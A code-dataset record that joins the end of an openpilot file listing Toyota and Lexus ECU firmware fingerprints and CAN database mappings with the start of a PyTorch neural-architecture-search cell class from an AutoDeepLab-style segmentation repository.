b'\x01896630EC9100\x00\x00\x00\x00',
b'\x018966333T5000\x00\x00\x00\x00',
b'\x018966333T5100\x00\x00\x00\x00',
b'\x018966333X6000\x00\x00\x00\x00',
b'\x01896633T07000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152606281\x00\x00\x00\x00\x00\x00',
b'\x01F152606340\x00\x00\x00\x00\x00\x00',
b'\x01F152606461\x00\x00\x00\x00\x00\x00',
b'\x01F15260E031\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33252\x00\x00\x00\x00\x00\x00',
b'8965B33590\x00\x00\x00\x00\x00\x00',
b'8965B33690\x00\x00\x00\x00\x00\x00',
b'8965B48271\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F33030D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3303200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3304100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F3304300\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.LEXUS_ESH_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x028966333S8000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966333S8000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966333T0100\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966333V4000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x02896633T09000\x00\x00\x00\x00897CF3307001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633423\x00\x00\x00\x00\x00\x00',
b'F152633680\x00\x00\x00\x00\x00\x00',
b'F152633681\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33252\x00\x00\x00\x00\x00\x00',
b'8965B33590\x00\x00\x00\x00\x00\x00',
b'8965B33690\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F33030D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3303100\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3303200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3304100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F3304200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F3304300\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.LEXUS_ESH: {
(Ecu.engine, 0x7e0, None): [
b'\x02333M4200\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633171\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881513310400\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33512\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4701100\x00\x00\x00\x00',
b'8821F4701300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F3302001\x00\x00\x00\x00',
b'8646F3302200\x00\x00\x00\x00',
],
},
CAR.LEXUS_NX: {
(Ecu.engine, 0x700, None): [
b'\x01896637850000\x00\x00\x00\x00',
b'\x01896637851000\x00\x00\x00\x00',
b'\x01896637852000\x00\x00\x00\x00',
b'\x01896637854000\x00\x00\x00\x00',
b'\x01896637878000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152678130\x00\x00\x00\x00\x00\x00',
b'F152678140\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881517803100\x00\x00\x00\x00',
b'881517803300\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B78060\x00\x00\x00\x00\x00\x00',
b'8965B78080\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F7801100\x00\x00\x00\x00',
b'8646F7801300\x00\x00\x00\x00',
],
},
CAR.LEXUS_NX_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x018966378B2100\x00\x00\x00\x00',
b'\x018966378G3000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152678221\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B78120\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b"\x018821F3301400\x00\x00\x00\x00",
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F78030A0\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F7803100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.LEXUS_NXH: {
(Ecu.engine, 0x7e0, None): [
b'\x0237841000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237842000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237880000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237882000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237886000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152678160\x00\x00\x00\x00\x00\x00',
b'F152678170\x00\x00\x00\x00\x00\x00',
b'F152678171\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881517804300\x00\x00\x00\x00',
b'881517804100\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B78060\x00\x00\x00\x00\x00\x00',
b'8965B78080\x00\x00\x00\x00\x00\x00',
b'8965B78100\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F7801300\x00\x00\x00\x00',
b'8646F7801100\x00\x00\x00\x00',
],
},
CAR.LEXUS_RC: {
(Ecu.engine, 0x7e0, None): [
b'\x0232484000\x00\x00\x00\x00\x00\x00\x00\x0052422000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152624221\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881512409100\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B24081\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F2402200\x00\x00\x00\x00',
],
},
CAR.LEXUS_RX: {
(Ecu.engine, 0x700, None): [
b'\x01896630E36200\x00\x00\x00\x00',
b'\x01896630E36300\x00\x00\x00\x00',
b'\x01896630E37200\x00\x00\x00\x00',
b'\x01896630E37300\x00\x00\x00\x00',
b'\x01896630E41000\x00\x00\x00\x00',
b'\x01896630E41100\x00\x00\x00\x00',
b'\x01896630E41200\x00\x00\x00\x00',
b'\x01896630E41500\x00\x00\x00\x00',
b'\x01896630EA3100\x00\x00\x00\x00',
b'\x01896630EA3400\x00\x00\x00\x00',
b'\x01896630EA4100\x00\x00\x00\x00',
b'\x01896630EA4300\x00\x00\x00\x00',
b'\x01896630EA4400\x00\x00\x00\x00',
b'\x01896630EA6300\x00\x00\x00\x00',
b'\x018966348R1300\x00\x00\x00\x00',
b'\x018966348R8500\x00\x00\x00\x00',
b'\x018966348W1300\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648472\x00\x00\x00\x00\x00\x00',
b'F152648473\x00\x00\x00\x00\x00\x00',
b'F152648492\x00\x00\x00\x00\x00\x00',
b'F152648493\x00\x00\x00\x00\x00\x00',
b'F152648474\x00\x00\x00\x00\x00\x00',
b'F152648630\x00\x00\x00\x00\x00\x00',
b'F152648494\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514810300\x00\x00\x00\x00',
b'881514810500\x00\x00\x00\x00',
b'881514810700\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B0E011\x00\x00\x00\x00\x00\x00',
b'8965B0E012\x00\x00\x00\x00\x00\x00',
b'8965B48102\x00\x00\x00\x00\x00\x00',
b'8965B48111\x00\x00\x00\x00\x00\x00',
b'8965B48112\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4701000\x00\x00\x00\x00',
b'8821F4701100\x00\x00\x00\x00',
b'8821F4701200\x00\x00\x00\x00',
b'8821F4701300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4801100\x00\x00\x00\x00',
b'8646F4801200\x00\x00\x00\x00',
b'8646F4802001\x00\x00\x00\x00',
b'8646F4802100\x00\x00\x00\x00',
b'8646F4802200\x00\x00\x00\x00',
b'8646F4809000\x00\x00\x00\x00',
],
},
CAR.LEXUS_RXH: {
(Ecu.engine, 0x7e0, None): [
b'\x02348J7000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348N0000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348Q4000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348Q4100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348T1100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348T3000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348V6000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348Z3000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648361\x00\x00\x00\x00\x00\x00',
b'F152648501\x00\x00\x00\x00\x00\x00',
b'F152648502\x00\x00\x00\x00\x00\x00',
b'F152648504\x00\x00\x00\x00\x00\x00',
b'F152648740\x00\x00\x00\x00\x00\x00',
b'F152648A30\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514811300\x00\x00\x00\x00',
b'881514811500\x00\x00\x00\x00',
b'881514811700\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B0E011\x00\x00\x00\x00\x00\x00',
b'8965B0E012\x00\x00\x00\x00\x00\x00',
b'8965B48111\x00\x00\x00\x00\x00\x00',
b'8965B48112\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4701000\x00\x00\x00\x00',
b'8821F4701100\x00\x00\x00\x00',
b'8821F4701200\x00\x00\x00\x00',
b'8821F4701300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4801200\x00\x00\x00\x00',
b'8646F4802001\x00\x00\x00\x00',
b'8646F4802100\x00\x00\x00\x00',
b'8646F4802200\x00\x00\x00\x00',
b'8646F4809000\x00\x00\x00\x00',
],
},
CAR.LEXUS_RX_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630EC9000\x00\x00\x00\x00',
b'\x01896634D12000\x00\x00\x00\x00',
b'\x01896630EB0000\x00\x00\x00\x00',
b'\x01896630EA9000\x00\x00\x00\x00',
b'\x01896630ED0000\x00\x00\x00\x00',
b'\x018966348W5100\x00\x00\x00\x00',
b'\x018966348W9000\x00\x00\x00\x00',
b'\x01896634D12100\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152648801\x00\x00\x00\x00\x00\x00',
b'\x01F15260E031\x00\x00\x00\x00\x00\x00',
b'\x01F15260E041\x00\x00\x00\x00\x00\x00',
b'\x01F152648781\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B48261\x00\x00\x00\x00\x00\x00',
b'8965B48271\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4810100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
],
},
CAR.LEXUS_RXH_TSS2: {
(Ecu.engine, 0x7e0, None): [
b'\x02348X8000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0234D14000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0234D16000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648831\x00\x00\x00\x00\x00\x00',
b'F152648D00\x00\x00\x00\x00\x00\x00',
b'F152648D60\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B48271\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4810100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
],
},
CAR.PRIUS_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x028966347B1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347C6000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347C8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x038966347C0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710101\x00\x00\x00\x00',
b'\x038966347C1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710101\x00\x00\x00\x00',
b'\x038966347C5000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4707101\x00\x00\x00\x00',
b'\x038966347C5100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4707101\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152647500\x00\x00\x00\x00\x00\x00',
b'F152647510\x00\x00\x00\x00\x00\x00',
b'F152647520\x00\x00\x00\x00\x00\x00',
b'F152647521\x00\x00\x00\x00\x00\x00',
b'F152647531\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B47070\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4707000\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4710000\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.MIRAI: {
(Ecu.esp, 0x7D1, None): [b'\x01898A36203000\x00\x00\x00\x00',],
(Ecu.esp, 0x7B0, None): [b'\x01F15266203200\x00\x00\x00\x00',], # a second ESP ECU
(Ecu.eps, 0x7A1, None): [b'\x028965B6204100\x00\x00\x00\x008965B6203100\x00\x00\x00\x00',],
(Ecu.fwdRadar, 0x750, 0xf): [b'\x018821F6201200\x00\x00\x00\x00',],
(Ecu.fwdCamera, 0x750, 0x6d): [b'\x028646F6201400\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',],
},
CAR.ALPHARD_TSS2: {
(Ecu.engine, 0x7e0, None): [
b'\x0235870000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0235883000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B58040\x00\x00\x00\x00\x00\x00',
b'8965B58052\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F58010C0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F5803200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
}
# Driver-override detection threshold on measured steering torque.
# NOTE(review): units are raw CAN torque counts — confirm against the DBC signal scaling.
STEER_THRESHOLD = 100
# Per-platform DBC file pair: (powertrain bus definitions, ADAS/radar bus definitions).
DBC = {
  CAR.RAV4H: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.RAV4: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
  CAR.PRIUS: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
  CAR.PRIUS_V: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
  CAR.COROLLA: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
  CAR.LEXUS_RC: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.LEXUS_RX: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.LEXUS_RXH: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.LEXUS_RX_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.LEXUS_RXH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.CHR: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
  CAR.CHRH: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
  CAR.CAMRY: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
  CAR.CAMRYH: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
  CAR.CAMRY_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.CAMRYH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.HIGHLANDER: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.HIGHLANDER_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.HIGHLANDERH: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.HIGHLANDERH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.AVALON: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.AVALON_2019: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
  CAR.AVALONH_2019: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
  CAR.AVALON_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.RAV4_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.COROLLA_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.COROLLAH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.LEXUS_ES_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.LEXUS_ESH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.LEXUS_ESH: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
  CAR.SIENNA: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.LEXUS_IS: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.LEXUS_CTH: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
  CAR.RAV4H_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.LEXUS_NXH: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.LEXUS_NX: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
  CAR.LEXUS_NX_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.PRIUS_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.MIRAI: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
  CAR.ALPHARD_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
}
# These cars have non-standard EPS torque scale factors. All others are 73
EPS_SCALE = defaultdict(lambda: 73, {CAR.PRIUS: 66, CAR.COROLLA: 88, CAR.LEXUS_IS: 77, CAR.LEXUS_RC: 77, CAR.LEXUS_CTH: 100, CAR.PRIUS_V: 100})
# Toyota/Lexus Safety Sense 2.0 and 2.5
TSS2_CAR = {CAR.RAV4_TSS2, CAR.COROLLA_TSS2, CAR.COROLLAH_TSS2, CAR.LEXUS_ES_TSS2, CAR.LEXUS_ESH_TSS2, CAR.RAV4H_TSS2,
            CAR.LEXUS_RX_TSS2, CAR.LEXUS_RXH_TSS2, CAR.HIGHLANDER_TSS2, CAR.HIGHLANDERH_TSS2, CAR.PRIUS_TSS2, CAR.CAMRY_TSS2, CAR.CAMRYH_TSS2,
            CAR.MIRAI, CAR.LEXUS_NX_TSS2, CAR.ALPHARD_TSS2, CAR.AVALON_TSS2}
# Platforms without a separate DSU (Driving Support Unit) ECU: all TSS2 cars plus a few TSS-P ones.
NO_DSU_CAR = TSS2_CAR | {CAR.CHR, CAR.CHRH, CAR.CAMRY, CAR.CAMRYH}
# no resume button press required
NO_STOP_TIMER_CAR = TSS2_CAR | {CAR.PRIUS_V, CAR.RAV4H, CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.SIENNA, CAR.LEXUS_ESH}
| 42.359094 | 260 | 0.651152 |
ace980b445b470e6e67bda670f40cf5354d7a0ce | 33,841 | py | Python | modeling/model_net_search.py | HankKung/Dynamic-AutoDeepLab | 4150a19d632269f7ebcb63e92906a7f40e6a283b | [
"Apache-2.0"
] | 9 | 2020-02-12T07:20:42.000Z | 2021-10-16T06:36:19.000Z | modeling/model_net_search.py | HankKung/Distributed-AutoDeepLab | 4150a19d632269f7ebcb63e92906a7f40e6a283b | [
"Apache-2.0"
] | 2 | 2020-04-02T06:39:53.000Z | 2021-01-19T10:36:07.000Z | modeling/model_net_search.py | HankKung/Distributed-AutoDeepLab | 4150a19d632269f7ebcb63e92906a7f40e6a283b | [
"Apache-2.0"
] | 3 | 2020-02-28T22:15:34.000Z | 2021-08-05T07:26:03.000Z | import torch
import torch.nn as nn
import numpy as np
from modeling.genotypes import PRIMITIVES
import torch.nn.functional as F
from modeling.operations import *
from modeling.sync_batchnorm.batchnorm import SynchronizedBatchNorm2d
class Cell_fixed(nn.Module):
    """A NAS cell whose internal operations are fixed by a searched genotype.

    The cell consumes the output of the cell two steps back (``s0``) and up to
    three resolution-variants of the previous cell's output (``s1_down`` /
    ``s1_same`` / ``s1_up``), each preprocessed to ``C_out`` channels, and runs
    the same fixed op list over every provided variant.

    Args:
        B: number of intermediate nodes inside the cell; the cell output
            concatenates the last ``B`` node features (so it has ``B * C_out``
            channels).
        prev_prev_C: channels of ``s0``; pass -1 to skip building the
            ``pre_preprocess`` branch.
        prev_C_down / prev_C_same / prev_C_up: channel counts of the previous
            cell's output at the higher / same / lower resolution; ``None``
            disables the corresponding preprocess path.
        C_out: per-op channel count inside the cell.
        cell: the searched cell architecture — assumed to be an array-like of
            ``(edge_index, primitive_index)`` rows (it is indexed as
            ``cell_arch[:, 0]`` in ``forward``).  TODO confirm exact dtype.
        BatchNorm: norm layer class to use.
        pre_preprocess_sample_rate: spatial ratio applied to ``s0``
            (1 = keep, 0.5 = halve, 0.25 = quarter via factorized reductions).
    """
    def __init__(self,
                B,
                prev_prev_C,
                prev_C_down,
                prev_C_same,
                prev_C_up,
                C_out,
                cell,
                BatchNorm=nn.BatchNorm2d,
                pre_preprocess_sample_rate=1):
        super(Cell_fixed, self).__init__()
        eps = 1e-5
        momentum = 0.1
        self.B = B
        self.cell_arch = cell
        # One preprocess module per resolution variant that this cell accepts.
        if prev_C_down is not None:
            self.preprocess_down = FactorizedReduce(
                prev_C_down, C_out, BatchNorm=BatchNorm, affine=False)
        if prev_C_same is not None:
            self.preprocess_same = ReLUConvBN(
                prev_C_same, C_out, 1, 1, 0, BatchNorm=BatchNorm, affine=False)
        if prev_C_up is not None:
            self.preprocess_up = ReLUConvBN(
                prev_C_up, C_out, 1, 1, 0, BatchNorm=BatchNorm, affine=False)
        self._ops = nn.ModuleList()
        # pre_preprocess adapts s0 (the cell two steps back); the sample rate
        # selects how much spatial reduction is needed to match this cell.
        if prev_prev_C != -1:
            if pre_preprocess_sample_rate >= 1:
                self.pre_preprocess = ReLUConvBN(
                    prev_prev_C, C_out, 1, 1, 0, BatchNorm=BatchNorm, affine=False)
            elif pre_preprocess_sample_rate == 0.5:
                self.pre_preprocess = FactorizedReduce(
                    prev_prev_C, C_out, BatchNorm=BatchNorm, affine=False)
            elif pre_preprocess_sample_rate == 0.25:
                self.pre_preprocess = DoubleFactorizedReduce(
                    prev_prev_C, C_out, BatchNorm=BatchNorm, affine=False)
        # Instantiate one concrete op per genotype row (x[1] indexes PRIMITIVES).
        for x in self.cell_arch:
            primitive = PRIMITIVES[x[1]]
            op = OPS[primitive](C_out, 1, BatchNorm, eps=eps, momentum=momentum, affine=False)
            self._ops.append(op)
    def scale_dimension(self, dim, scale):
        # "align_corners"-style size scaling: maps dim to the scaled grid size.
        return int((float(dim) - 1.0) * scale + 1.0)
    def prev_feature_resize(self, prev_feature, mode):
        # Resize a feature map by 2x down ('down') or 2x up ('up') bilinearly.
        if mode == 'down':
            feature_size_h = self.scale_dimension(prev_feature.shape[2], 0.5)
            feature_size_w = self.scale_dimension(prev_feature.shape[3], 0.5)
        elif mode == 'up':
            feature_size_h = self.scale_dimension(prev_feature.shape[2], 2)
            feature_size_w = self.scale_dimension(prev_feature.shape[3], 2)
        return F.interpolate(prev_feature, (feature_size_h, feature_size_w), mode='bilinear')
    def forward(self, s0, s1_down, s1_same, s1_up):
        """Run the fixed cell over each provided resolution variant.

        Returns a list with one ``B * C_out``-channel tensor per non-None
        ``s1_*`` input, in down/same/up order — callers rely on this order
        when unpacking (e.g. ``out_down, out_same = cell(...)``).
        """
        if s1_down is not None:
            s1_down = self.preprocess_down(s1_down)
            size_h, size_w = s1_down.shape[2], s1_down.shape[3]
        if s1_same is not None:
            s1_same = self.preprocess_same(s1_same)
            size_h, size_w = s1_same.shape[2], s1_same.shape[3]
        if s1_up is not None:
            s1_up = self.prev_feature_resize(s1_up, 'up')
            s1_up = self.preprocess_up(s1_up)
            size_h, size_w = s1_up.shape[2], s1_up.shape[3]
        all_states = []
        if s0 is not None:
            # Align s0 spatially with the last processed s1_* (upsample only).
            s0 = F.interpolate(s0, (size_h, size_w), mode='bilinear') if (
                s0.shape[2] < size_h) or (s0.shape[3] < size_w) else s0
            s0 = self.pre_preprocess(s0)
            if s1_down is not None:
                states_down = [s0, s1_down]
                all_states.append(states_down)
                del s1_down
            if s1_same is not None:
                states_same = [s0, s1_same]
                all_states.append(states_same)
                del s1_same
            if s1_up is not None:
                states_up = [s0, s1_up]
                all_states.append(states_up)
                del s1_up
        else:
            # No s0: use a scalar 0 placeholder so edge indexing stays aligned.
            if s1_down is not None:
                states_down = [0, s1_down]
                all_states.append(states_down)
            if s1_same is not None:
                states_same = [0, s1_same]
                all_states.append(states_same)
            if s1_up is not None:
                states_up = [0, s1_up]
                all_states.append(states_up)
        del s0
        final_concates = []
        for states in all_states:
            # Walk the DAG: node i sums the ops applied to its selected inputs.
            # `offset + j` is the flat edge index; only edges listed in the
            # genotype's first column have an op instantiated for them.
            offset = 0
            ops_index = 0
            for i in range(self.B):
                new_states = []
                for j, h in enumerate(states):
                    branch_index = offset + j
                    if branch_index in self.cell_arch[:, 0]:
                        new_state = self._ops[ops_index](h)
                        new_states.append(new_state)
                        ops_index += 1
                s = sum(new_states)
                offset += len(states)
                states.append(s)
            # Cell output: channel-concat of the last B intermediate nodes.
            concat_feature = torch.cat(states[-self.B:], dim=1)
            final_concates.append(concat_feature)
        return final_concates
